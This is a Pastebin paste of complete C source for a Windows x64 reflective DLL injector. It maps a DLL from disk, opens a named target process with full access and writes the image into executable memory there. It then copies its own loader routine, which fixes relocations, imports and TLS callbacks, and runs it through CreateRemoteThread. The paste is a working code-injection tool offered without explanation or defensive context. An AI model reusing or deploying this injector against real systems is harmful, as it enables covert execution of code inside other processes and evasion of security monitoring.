shifat627

Reflective DLL Injection Method 2

Feb 5th, 2019
819
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include<stdio.h>
  2. #include<windows.h>
  3. #include<dbghelp.h>
  4. #include<tlhelp32.h>
  5. #include<string.h>
  6. #pragma pack(1)
  7.  
  8. typedef struct _PE_INFO_
  9. {
  10.     BOOL Brloc;
  11.     BOOL Cleanup;
  12.     DWORD Cleanup_RVA;
  13.     LPVOID (*Get_Proc)(LPVOID , LPSTR);
  14.     LPVOID (*Load_Dll)(LPSTR);
  15.     LPVOID base;
  16. } PE_INFO , * LPE_INFO ;
  17.  
  18.  
  19. LPVOID Memory_Map_File(const char * Filename)
  20. {
  21.     HANDLE f,mmap;
  22.    
  23.    
  24.     if((f=CreateFileA(Filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL))==INVALID_HANDLE_VALUE)
  25.     {
  26.         printf("[-]Failed To Open File");
  27.         return NULL;
  28.     }
  29.    
  30.     if((mmap=CreateFileMappingA(f,NULL,PAGE_READONLY,0,0,NULL))==NULL)
  31.     {
  32.         printf("[-]CreateFileMappingA() Failed..");
  33.         return NULL;
  34.     }
  35.    
  36.     return MapViewOfFile(mmap,FILE_MAP_READ,0,0,0);
  37. }
  38.  
  39.  
  40. BOOL Find_Process(const char * Process_Name,PHANDLE p)
  41. {
  42.     PROCESSENTRY32 ps;
  43.     HANDLE Snap;
  44.     ps.dwSize=sizeof(ps);
  45.     *p=NULL;
  46.     if((Snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0))==INVALID_HANDLE_VALUE)
  47.     {
  48.         printf("[-]Failed To Enumurate Process");
  49.         return FALSE;
  50.     }
  51.    
  52.     if(!Process32First(Snap,&ps))
  53.     return FALSE;
  54.    
  55.     do
  56.     {
  57.         if(!strcmp(Process_Name,ps.szExeFile))
  58.         {
  59.             CloseHandle(Snap);
  60.             *p=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);
  61.             if(*p==NULL)
  62.             return FALSE;
  63.             else
  64.             return TRUE;
  65.         }
  66.     }while(Process32Next(Snap,&ps));
  67.    
  68.     return FALSE;
  69. }
  70.  
  71. BOOL Get_Rva(LPVOID base, PIMAGE_NT_HEADERS nt, char * name,PDWORD rva)
  72. {
  73.     PIMAGE_EXPORT_DIRECTORY exp=(PIMAGE_EXPORT_DIRECTORY)ImageRvaToVa(nt,base,nt->OptionalHeader.DataDirectory[0].VirtualAddress,NULL);
  74.     PDWORD Name;
  75.     PDWORD addr;
  76.     PWORD ord;
  77.     int i;
  78.    
  79.     ord=(PWORD)ImageRvaToVa(nt,base,exp->AddressOfNameOrdinals,NULL);
  80.     Name=(PDWORD)ImageRvaToVa(nt,base,exp->AddressOfNames,NULL);
  81.     addr=(PDWORD)ImageRvaToVa(nt,base,exp->AddressOfFunctions,NULL);
  82.    
  83.     for(i=0;i<exp->NumberOfNames;i++)
  84.     {
  85.         LPSTR Func=(LPSTR)ImageRvaToVa(nt,base,Name[i],NULL);
  86.         if(!strcmp(Func,name))
  87.         {
  88.             *rva=addr[ord[i]];
  89.             return 1;
  90.         }
  91.     }
  92.  
  93.     return 0;
  94. }
  95.  
  96. void Adjust_PE(LPE_INFO pe)
  97. {
  98.     LPVOID base;
  99.     PIMAGE_DOS_HEADER dos;
  100.     PIMAGE_NT_HEADERS nt;
  101.     PIMAGE_BASE_RELOCATION rloc;
  102.     PIMAGE_TLS_DIRECTORY tls;
  103.     PIMAGE_TLS_CALLBACK * Callback;
  104.     PIMAGE_IMPORT_DESCRIPTOR imp;
  105.     PIMAGE_THUNK_DATA Othunk,Fthunk;
  106.     void (*Entry)(LPVOID , DWORD , LPVOID);
  107.    
  108.    
  109.     base=pe->base;
  110.     dos=(PIMAGE_DOS_HEADER)base;
  111.     nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
  112.    
  113.     if(!pe->Brloc)
  114.     goto Load_Import;
  115.    
  116.     Base_Reloc:
  117.         if(!nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)
  118.         goto Load_Import;
  119.        
  120.         ULONG64 delta=(ULONG64)base-nt->OptionalHeader.ImageBase;
  121.         rloc=(PIMAGE_BASE_RELOCATION)(base+nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
  122.         while(rloc->VirtualAddress)
  123.         {
  124.             LPVOID Dest=base+rloc->VirtualAddress;
  125.             int n=(rloc->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2;
  126.             int i;
  127.             PWORD data=(PWORD)((LPVOID)rloc+sizeof(IMAGE_BASE_RELOCATION));
  128.             for(i=0;i<n;i++,data++)
  129.             {
  130.                 if(((*data)>>12)==10)
  131.                 {
  132.                     PULONG64 p=(PULONG64)(Dest+((*data)&0xfff));
  133.                     *p+=delta;
  134.                 }
  135.             }
  136.             rloc=(PIMAGE_BASE_RELOCATION)((LPVOID)rloc+rloc->SizeOfBlock);
  137.         }
  138.    
  139.     Load_Import:
  140.         if(!nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress)
  141.         goto TLS;
  142.        
  143.         imp=(PIMAGE_IMPORT_DESCRIPTOR)(base+nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
  144.         while(imp->Name)
  145.         {
  146.             LPVOID dll=pe->Load_Dll(base+imp->Name);
  147.             Othunk=(PIMAGE_THUNK_DATA)(base+imp->OriginalFirstThunk);
  148.             Fthunk=(PIMAGE_THUNK_DATA)(base+imp->FirstThunk);
  149.            
  150.             if(!imp->OriginalFirstThunk)
  151.             Othunk=Fthunk;
  152.            
  153.             while(Othunk->u1.AddressOfData)
  154.             {
  155.                 if(Othunk->u1.Ordinal & IMAGE_ORDINAL_FLAG)
  156.                 {
  157.                     *(PULONG64)Fthunk=(ULONG64)pe->Get_Proc(dll,(LPSTR)IMAGE_ORDINAL(Othunk->u1.Ordinal));
  158.                 }
  159.                 else
  160.                 {
  161.                     PIMAGE_IMPORT_BY_NAME fn=(PIMAGE_IMPORT_BY_NAME)(base+Othunk->u1.AddressOfData);
  162.                     *(PULONG64)Fthunk=(ULONG64)pe->Get_Proc(dll,fn->Name);
  163.                 }
  164.                 Othunk++;
  165.                 Fthunk++;
  166.             }
  167.             imp++;
  168.         }
  169.     TLS:
  170.         if(!nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress)
  171.         goto Execute_Entry;
  172.        
  173.         tls=(PIMAGE_TLS_DIRECTORY)(base+nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress);
  174.         if(!tls->AddressOfCallBacks)
  175.         goto Execute_Entry;
  176.        
  177.         Callback=(PIMAGE_TLS_CALLBACK *)tls->AddressOfCallBacks;
  178.         while(*Callback)
  179.         {
  180.             (*Callback)(base,1,NULL);
  181.             Callback++;
  182.         }
  183.        
  184.     Execute_Entry:
  185.         if(pe->Cleanup)
  186.         {
  187.             Entry=(base+pe->Cleanup_RVA);
  188.             (*Entry)(base,nt->OptionalHeader.AddressOfEntryPoint,pe);
  189.         }
  190.         else
  191.         {
  192.             Entry=(base+nt->OptionalHeader.AddressOfEntryPoint);
  193.             (*Entry)(base,1,NULL);
  194.         }
  195.    
  196. }
  197.  
  198.  
  199. int main(int i,char *arg[])
  200. {
  201.     LPVOID base,Rbase;
  202.     PIMAGE_DOS_HEADER dos;
  203.     PIMAGE_NT_HEADERS nt;
  204.     PIMAGE_SECTION_HEADER sec;
  205.     HANDLE proc;PE_INFO pe;
  206.    
  207.     if(i!=3)
  208.     {
  209.         printf("[!]Usage %s <DLL> <Process Name>",arg[0]);
  210.         return 1;
  211.     }
  212.    
  213.     if((base=Memory_Map_File(arg[1]))==NULL)
  214.     {
  215.         printf("[-]Failed To Memory Map File");
  216.         return 1;
  217.     }
  218.    
  219.     printf("[+]File is Memory Mapped Successfully\n");
  220.    
  221.     ZeroMemory(&pe,sizeof(pe));
  222.    
  223.     dos=(PIMAGE_DOS_HEADER)base;
  224.    
  225.     if(dos->e_magic!=23117)
  226.     {
  227.         printf("\n[-]Invalid PE");
  228.         return 1;
  229.     }
  230.    
  231.     nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
  232.    
  233.     if(nt->OptionalHeader.Magic!=IMAGE_NT_OPTIONAL_HDR64_MAGIC)
  234.     {
  235.         printf("[-]Please use x64 PE");
  236.         return 1;
  237.     }
  238.    
  239.    
  240.     if(!Find_Process(arg[2],&proc))
  241.     {
  242.         printf("\n[-]Failed To Open Process");
  243.         return 1;
  244.     }
  245.     else
  246.     printf("[+]\'%s\' is Openned\n",arg[2]);
  247.      
  248.     printf("[!]Allocating Memory Into \'%s\'\n",arg[2]);
  249.      
  250.      
  251.      
  252.     if((Rbase=VirtualAllocEx(proc,(LPVOID)nt->OptionalHeader.ImageBase,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE ,PAGE_EXECUTE_READWRITE))==NULL)
  253.     {
  254.         pe.Brloc=TRUE;
  255.         if((Rbase=VirtualAllocEx(proc,NULL,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE ,PAGE_EXECUTE_READWRITE))==NULL)
  256.         {
  257.             printf("\n[-]Failed To Allocate Memory Into Remote Process");
  258.             CloseHandle(proc);
  259.             return 1;
  260.         }
  261.     }
  262.    
  263.     printf("\n[+]Copying File Content into Remote Process\n");
  264.    
  265.     WriteProcessMemory(proc,Rbase,base,nt->OptionalHeader.SizeOfHeaders,NULL);
  266.    
  267.     sec=(PIMAGE_SECTION_HEADER)((LPVOID)nt+sizeof(IMAGE_NT_HEADERS));
  268.    
  269.     for(i=0;i<nt->FileHeader.NumberOfSections;i++)
  270.     {
  271.         WriteProcessMemory(proc,Rbase+sec->VirtualAddress,base+sec->PointerToRawData,sec->SizeOfRawData,NULL);
  272.         sec++;
  273.     }  
  274.        
  275.     pe.base=Rbase;
  276.     pe.Get_Proc=GetProcAddress;
  277.     pe.Load_Dll=LoadLibraryA;
  278.    
  279.     if(Get_Rva(base,nt,"_PE_CLEANUP",&pe.Cleanup_RVA))
  280.     {
  281.         pe.Cleanup=TRUE;
  282.     }
  283.    
  284.    
  285.     DWORD len=(DWORD)((ULONG64)main-(ULONG64)Adjust_PE);
  286.     LPVOID temp=VirtualAllocEx(proc,NULL,len+sizeof(pe),MEM_COMMIT | MEM_RESERVE , PAGE_EXECUTE_READWRITE);
  287.     if(temp==NULL)
  288.     {
  289.         printf("\n[-]Insufficiant Memory For PE Configurator\n");
  290.         VirtualFreeEx(proc,Rbase,0,MEM_RELEASE);
  291.         return 1;
  292.     }
  293.    
  294.    
  295.     WriteProcessMemory(proc,temp,&pe,sizeof(pe),NULL);
  296.     WriteProcessMemory(proc,temp+sizeof(pe),Adjust_PE,len,NULL);
  297.    
  298.     printf("\n[+]Configuring PE and Executing...");
  299.     if(!CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)temp+sizeof(pe),temp,0,NULL))
  300.     {
  301.         printf("\n[-]Failed To Create Thread..");VirtualFreeEx(proc,Rbase,0,MEM_RELEASE);
  302.         return 1;
  303.     }
  304.     CloseHandle(proc);
  305.     return 0;
  306. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×